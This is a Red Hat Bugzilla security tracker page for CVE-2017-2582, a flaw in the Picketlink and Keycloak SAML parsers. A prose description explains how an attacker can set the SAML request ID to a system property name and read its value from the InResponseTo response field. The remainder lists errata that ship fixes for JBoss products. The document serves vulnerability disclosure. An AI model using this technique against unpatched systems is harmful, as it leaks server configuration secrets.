Bugzilla will be upgraded to version 5.0 on a still to be determined date in the near future. The original upgrade date has been delayed.
First Last Prev Next    This bug is not in your last search results.
Bug 1410481 - (CVE-2017-2582) CVE-2017-2582 picketlink, keycloak: SAML request parser replaces special strings with system properties
CVE-2017-2582 picketlink, keycloak: SAML request parser replaces special stri...
Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
medium Severity medium
: ---
: ---
Assigned To: Red Hat Product Security
impact=moderate,public=20170926,repor...
: Security
Depends On: 1414137 1414138
Blocks: 1410492 1493931 1510311
  Show dependency treegraph
 
Reported: 2017-01-05 10:31 EST by Adam Mariš
Modified: 2018-10-19 17:39 EDT (History)
75 users (show)

See Also:
Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
It was found that while parsing the SAML messages the StaxParserUtil class of Picketlink replaces special strings for obtaining attribute values with system property. This could allow an attacker to determine values of system properties at the attacked system by formatting the SAML request ID field to be the chosen system property which could be obtained in the "InResponseTo" field in the response.
Story Points: ---
Clone Of:
Environment:
Last Closed:
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)
Add an attachment (proposed patch, testcase, etc.)


External Trackers
Tracker ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2017:2808 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform security update 2017-09-26 18:39:54 EDT
Red Hat Product Errata RHSA-2017:2809 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform security update 2017-09-26 18:51:56 EDT
Red Hat Product Errata RHSA-2017:2810 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform security update 2017-09-26 17:58:02 EDT
Red Hat Product Errata RHSA-2017:2811 normal SHIPPED_LIVE Important: eap7-jboss-ec2-eap security update 2017-09-26 19:14:16 EDT
Red Hat Product Errata RHSA-2017:3216 normal SHIPPED_LIVE Moderate: Red Hat JBoss Enterprise Application Platform 6.4.18 security update 2017-11-14 20:30:42 EST
Red Hat Product Errata RHSA-2017:3217 normal SHIPPED_LIVE Moderate: Red Hat JBoss Enterprise Application Platform 6.4.18 security update 2017-11-14 20:27:28 EST
Red Hat Product Errata RHSA-2017:3218 normal SHIPPED_LIVE Moderate: Red Hat JBoss Enterprise Application Platform 6.4.18 security update 2017-11-14 20:23:58 EST
Red Hat Product Errata RHSA-2017:3219 normal SHIPPED_LIVE Moderate: jboss-ec2-eap security, bug fix, and enhancement update for EAP 6.4.18 2017-11-14 20:51:06 EST
Red Hat Product Errata RHSA-2017:3220 normal SHIPPED_LIVE Moderate: Red Hat JBoss Enterprise Application Platform 6.4.18 security update 2017-11-14 20:37:47 EST
Red Hat Product Errata RHSA-2018:2740 None None None 2018-09-24 17:46 EDT
Red Hat Product Errata RHSA-2018:2741 None None None 2018-09-24 18:04 EDT
Red Hat Product Errata RHSA-2018:2742 None None None 2018-09-24 18:08 EDT
Red Hat Product Errata RHSA-2018:2743 None None None 2018-09-24 18:09 EDT

  None (edit)
Description Adam Mariš 2017-01-05 10:31:11 EST 
It was found that Picketlink implementation replaces special strings for obtaining attribute values with system property values in SAML messages while parsing. An attacker can misuse this to determine values of system properties at the attacked system by formatting the SAML request ID field to the chosen system property name of his liking, obtaining the property value in "InResponseTo" field in the response.

Upstream bug (for Keycloak):

https://issues.jboss.org/browse/KEYCLOAK-4160
Comment 2 Adam Mariš 2017-01-10 06:44:35 EST 
Acknowledgments:

Name: Hynek Mlnarik (Red Hat)
Comment 5 Jason Shepherd 2017-09-17 21:50:47 EDT 
JON-3 is not affected by this issue because it's not supported as a SSO Identity Provider.
Comment 6 errata-xmlrpc 2017-09-26 13:58:22 EDT 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0.8

Via RHSA-2017:2810 https://access.redhat.com/errata/RHSA-2017:2810
Comment 7 errata-xmlrpc 2017-09-26 14:41:05 EDT 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7

Via RHSA-2017:2808 https://access.redhat.com/errata/RHSA-2017:2808
Comment 8 errata-xmlrpc 2017-09-26 14:53:21 EDT 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6

Via RHSA-2017:2809 https://access.redhat.com/errata/RHSA-2017:2809
Comment 9 errata-xmlrpc 2017-09-26 15:14:39 EDT 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7
  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6

Via RHSA-2017:2811 https://access.redhat.com/errata/RHSA-2017:2811
Comment 11 errata-xmlrpc 2017-11-14 15:37:20 EST 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7

Via RHSA-2017:3218 https://access.redhat.com/errata/RHSA-2017:3218
Comment 12 errata-xmlrpc 2017-11-14 15:38:03 EST 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6

Via RHSA-2017:3217 https://access.redhat.com/errata/RHSA-2017:3217
Comment 13 errata-xmlrpc 2017-11-14 15:38:26 EST 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 5

Via RHSA-2017:3216 https://access.redhat.com/errata/RHSA-2017:3216
Comment 14 errata-xmlrpc 2017-11-14 15:39:49 EST 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform

Via RHSA-2017:3220 https://access.redhat.com/errata/RHSA-2017:3220
Comment 15 errata-xmlrpc 2017-11-14 15:51:31 EST 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6

Via RHSA-2017:3219 https://access.redhat.com/errata/RHSA-2017:3219
Comment 20 Jason Shepherd 2018-01-16 23:39:00 EST 
RHMAP services, UPS and Millicore don't use SAML features of embedded Keycloak.
Comment 21 errata-xmlrpc 2018-09-24 17:46:28 EDT 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform

Via RHSA-2018:2740 https://access.redhat.com/errata/RHSA-2018:2740
Comment 22 errata-xmlrpc 2018-09-24 18:04:20 EDT 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7

Via RHSA-2018:2741 https://access.redhat.com/errata/RHSA-2018:2741
Comment 23 errata-xmlrpc 2018-09-24 18:08:12 EDT 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 5

Via RHSA-2018:2742 https://access.redhat.com/errata/RHSA-2018:2742
Comment 24 errata-xmlrpc 2018-09-24 18:09:29 EDT 
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6

Via RHSA-2018:2743 https://access.redhat.com/errata/RHSA-2018:2743
Note You need to log in before you can comment on or make changes to this bug.
First Last Prev Next    This bug is not in your last search results.